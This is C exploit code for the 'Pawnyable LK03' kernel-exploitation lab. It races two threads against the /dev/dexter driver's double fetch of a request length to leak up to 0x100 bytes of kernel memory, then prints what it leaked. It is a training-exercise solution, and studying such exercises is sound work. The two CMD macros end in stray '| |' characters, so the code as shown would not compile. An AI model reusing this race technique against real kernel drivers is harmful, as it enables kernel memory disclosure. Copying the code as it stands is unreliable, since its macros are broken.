Pawnyable LK03
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#define CMD_GET 0xdec50001 | |
#define CMD_SET 0xdec50002 | |
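/*
 * Report the last OS error for `msg` (via perror) and terminate the process.
 *
 * Only meaningful right after a call that set errno. The exit status is the
 * original exit(-1), which the shell observes as 255. Marked _Noreturn and
 * const-qualified; callers passing string literals are unaffected.
 */
_Noreturn void fatal(const char *msg) {
    perror(msg);
    exit(-1);
}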
/*
 * Request descriptor handed to the driver by address through
 * ioctl(CMD_GET / CMD_SET). It lives in this process's memory, so the
 * driver, not this program, reads the fields when it services the call;
 * the race thread below rewrites `len` while requests are in flight.
 */
typedef struct {
    char *ptr;    /* user buffer the transfer reads from (SET) or writes to (GET) */
    size_t len;   /* requested transfer length in bytes */
} request_t;
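int fd;              /* handle to /dev/dexter, opened in main() */
request_t req;       /* intentionally shared with the race thread (see race()) */
/*
 * Set to 1 by main() once leaked bytes are observed and polled by race().
 * Declared atomic because one thread writes it while another reads it in a
 * loop; a plain int there is a data race (undefined behaviour). Plain
 * `while (!race_win)` / `race_win = 1` keep working on an atomic_int.
 */
atomic_int race_win = 0;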
/*
 * Fill the shared request with buf/len and submit it as CMD_SET.
 * Returns whatever ioctl() returns; errors are left to the caller.
 */
int set(char *buf, size_t len) {
    request_t *r = &req;
    r->ptr = buf;
    r->len = len;
    return ioctl(fd, CMD_SET, r);
}
/*
 * Fill the shared request with buf/len and submit it as CMD_GET.
 * Returns whatever ioctl() returns; errors are left to the caller.
 */
int get(char *buf, size_t len) {
    request_t *r = &req;
    r->ptr = buf;
    r->len = len;
    return ioctl(fd, CMD_GET, r);
}
/*
 * Thread body: keep rewriting the shared request length to 0x100 until
 * main() flags success in race_win. `arg` is unused. The 1 us sleep between
 * writes presumably gives main()'s ioctl loop a chance to run.
 */
void *race(void *arg) {
    (void)arg;
    puts("[*] trying to set req.len to 0x100");
    for (;;) {
        if (race_win)
            break;
        req.len = 0x100;
        usleep(1);
    }
    return NULL;
}
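/*
 * Demonstrates a time-of-check/time-of-use window in the driver's length
 * handling: this thread repeatedly requests 0x20 bytes while race() keeps
 * bumping req.len to 0x100. If the driver re-reads the length from user
 * memory after validating it (a double fetch), one request can copy more
 * than 0x20 bytes into buf; that is detected when any byte of the
 * initially all-zero buf becomes non-zero. The full buffer is then dumped.
 *
 * Changes from the original: pthread_create's result is checked, and the
 * dump reads each word with memcpy instead of casting &buf[i] to
 * unsigned long * (a strict-aliasing / alignment violation).
 */
int main(void) {
    fd = open("/dev/dexter", O_RDWR);
    if (fd == -1)
        fatal("/dev/dexter");

    char buf[0x100] = {0};
    char zero[0x100] = {0};

    pthread_t th;
    int rc = pthread_create(&th, NULL, race, NULL);
    if (rc != 0) {
        /* pthread_create returns the error number; it does not set errno */
        fprintf(stderr, "pthread_create: %s\n", strerror(rc));
        close(fd);
        exit(-1);
    }

    puts("[*] trying to read 0x20 from /dev/dexter");
    while (!race_win) {
        /*
         * The return value is deliberately ignored: whenever the other
         * thread's 0x100 is visible at validation time the driver presumably
         * rejects the request, and only the interleaving that slips past the
         * check matters here. Stopping on the first error would end the loop
         * almost immediately.
         */
        get(buf, 0x20);
        /* buf started all-zero, so any non-zero byte means the driver wrote
         * data into it */
        if (memcmp(buf, zero, sizeof buf) != 0) {
            puts("[+] reached race condition");
            race_win = 1;
            break;
        }
    }
    pthread_join(th, NULL);

    puts("[+] more than 0x20 data is leaked:");
    for (size_t i = 0; i < sizeof buf; i += sizeof(unsigned long)) {
        unsigned long word;
        memcpy(&word, &buf[i], sizeof word);   /* well-defined load, no aliasing cast */
        printf("%02zx: 0x%016lx\n", i, word);
    }
    close(fd);
    return 0;
}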